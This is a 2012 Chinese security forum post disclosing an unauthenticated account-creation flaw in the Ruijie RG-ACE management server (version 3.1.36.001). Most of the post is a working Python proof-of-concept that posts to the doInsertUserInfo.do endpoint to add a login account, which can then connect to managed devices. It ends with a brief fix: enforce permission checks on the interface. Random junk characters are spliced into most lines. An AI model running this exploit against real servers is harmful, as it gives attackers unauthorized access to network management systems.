找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2128|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)/ Z$ |4 \' @9 _
( I- @! k, ^- A

! s3 b. y- F" Z1 H) T! X: i9 r测试的具体版本是9 D1 |+ e, D' k# x/ E; b
产品名称: 锐捷应用控制引擎( ]6 \3 W1 ~& g; z. w
版本号: 3.1.36.001 TC
; b% ^+ h# Y* G编译时间: 201104291730
. i# C% \4 ?$ \; ]. ~" g: O" O
! \" Z& J. M5 Z4 v
6 r4 |" b9 Y$ @# T漏洞证明:0 _9 X; U9 q' H( G+ v
7 k  x8 j; _- ^- x

4 y* D/ X2 T* h4 j+ G- f# `2 q
8 g' `: ?: ~8 T
# B. G7 z9 c. |0 ]% s2 f% n- Z, J. B# M1 W

/ u+ G% p" s5 c+ h/ o8 k执行脚本
3 G6 N$ Z: M& d9 K#! /usr/bin/env python3 v1 B9 `+ s0 W" j- @
#coding=gbk) z' {8 V9 N: B% v
#RG-ACE管理服务器 V3.1.36.001
1 |4 O1 {" T' z+ w+ Himport urllib2, urllib,cookielib# J- J: j5 h( W; }4 P$ |, R2 J
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
% N( O3 i# L( z2 e7 C3 `opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
& h  z" d8 h" Jopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]- V$ t$ O9 H9 p& c6 l4 D
post=(("event","userManager.doInsertUserInfo"),
6 _, m0 d  T" U7 ?. L2 u; @3 g("useractionname","addButtonValue"),
5 F8 k/ i+ D0 B1 d& A* ~9 D& v7 ]0 z("useropermanager","userManager"),
# x9 A, p" i$ j) D("userName","t"), #######账号自己加
7 y3 S! o8 r/ `  z, J0 G3 J7 O("pwd","aaaaaa"),######密码自己加
- Z* G. J& ^. ^* a" o. ]("trueName","ad"),% n. ?9 B, {8 L1 E* {
("email",""),' c6 E. F# S& M$ F
("mobilePhone",""),1 D4 y! g: F0 I7 o, e$ e- a
("officePhone",""),
: r4 x! V6 s; G$ h* m("addr",""),
# B  g- _% Z4 ?4 i("submit","确定"))
# r9 F  I! ~9 d, r; f. _+ Curllib2.install_opener(opener)( P' b4 e/ a; L* w/ x+ q1 m
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
) ?! `0 H1 y7 E: D9 r( K) dprint "Done"- R) `% e  _* k" u$ [
- [7 X* D$ z+ V0 x( w; j
登录,连接设备7 i' S5 D9 o1 n% Z# J" w; _

9 c4 l, _3 Q& ^
- A0 L: y3 l8 y; S
2 b' y5 B' {& K# I4 v& d# T. |
) o' ?7 `5 B! ~; A9 d% w1 A/ o- A6 N7 V' Y7 T% m0 D
默认的管理员admin权限更大点4 H4 `: L! t4 l5 E  q; k2 v9 D
+ {7 t8 x* B5 i0 _

% q, X2 \" `7 r7 R; x- X8 M3 g9 m

+ o. ^4 R) `- t% J. V+ T7 W4 ?6 d3 Z$ s4 R2 e- s5 b6 V+ ~& S
修复方案:
' q1 e$ t0 G2 P- j& j% t加强对接口的权限验证. F2 u6 s# P; Z9 c  x5 k6 Z
" `  S: H; F# }: M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表